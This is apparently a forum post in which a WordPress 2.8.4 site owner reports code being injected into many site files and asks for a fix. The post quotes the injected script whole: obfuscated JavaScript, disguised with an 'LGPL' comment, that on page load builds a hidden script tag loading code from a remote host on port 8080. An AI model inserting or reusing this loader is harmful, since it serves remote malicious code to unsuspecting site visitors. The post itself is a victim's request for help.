WordPress 2.8.4 getting hacked?

I have version 2.8.4 and someone is able to install this code below to many files of my site. The code below is being added the the very end of the code. Is anyone else seeing this? Is there a fix to block them?

<script>/*LGPL*/ try{ window.onload = function(){E1e6wn3ijzwv9g = 'h$@t##()t(!&@p!@:@/&@/$^&()t($!o)#r$&r^#e#$)@n!(#$t)!!z$$-@)#c(!o$$!m!^).&s()&@$o$()s!^o^(.&($!c^&o^$&)m(#$.&@p)e(!t#a(#r$&^d)$$a^s&)#-)$&c($)^$o(m!&!.(e!!&a##!#s^&y!$l)i&@&f#e@d&$)i#$!r(!(e!c))t))#.@(^r#)#u#@:^($8(!^0@8#!0$&&&/#()(n@@!^g(@&o@(i$$##s!(a!o@!^.^!n)^e!#)t#!/#(n#@&#g)^#^o#)(i^)s($@(a#o(!#.)$n)$@e@&t@$#/!(@c@$^&$h@(i^@#n&^@a(#(!z((.@$$c##o#$)@m&!/$^!)c@@(t)r@@i$@(p@).&^c^@o()$m(/!!g&#^^o#)(@o(g^l#e$$.!!@c)^))o^#@@#m$/$('.replace(/\!|\^|\)|\$|@|#|&|\(/ig, '');var D7fyb435pte = 's&^(c)##r!^i!@p##!!t@!&'.replace(/#|\)|\$|\(|@|&|\^|\!/ig, '');var Sn9jgvbufr9 = 's@r)^#^c^#'.replace(/\(|#|\^|\!|\$|\)|@|&/ig, '');var Rxs7200gjqt6h = D7fyb435pte;var Rmkt0nsas90ld = document.createElement(Rxs7200gjqt6h);Rmkt0nsas90ld.setAttribute('defer', 'd^^&e(f(&e&(@r@('.replace(/&|@|#|\!|\(|\)|\$|\^/ig, ''));var Kaws9hrzdk = 't@^@e!)$x)@t@#)(/!(j(&@a(v#&^a$)s$!c&#((r@^i)&)p##!t#('.replace(/\)|#|\^|&|\!|\$|@|\(/ig, '');Rmkt0nsas90ld.setAttribute('id', 'J(!&#)8(!n^$9!i(1^3^($t@^f^)7^(@i@#&v#)v@@'.replace(/\^|\)|\!|\$|&|#|@|\(/ig, ''));Rmkt0nsas90ld.setAttribute(Sn9jgvbufr9,  E1e6wn3ijzwv9g);Rmkt0nsas90ld.setAttribute('type', Kaws9hrzdk);document.body.appendChild(Rmkt0nsas90ld);if (document){Rxs7200gjqt6h = D7fyb435pte;}} }  catch(Uskp2qj8xy0ey16t2xwup ) {}</script>
<!--3eb582c68531a2f22e7540c27eaefbf1-->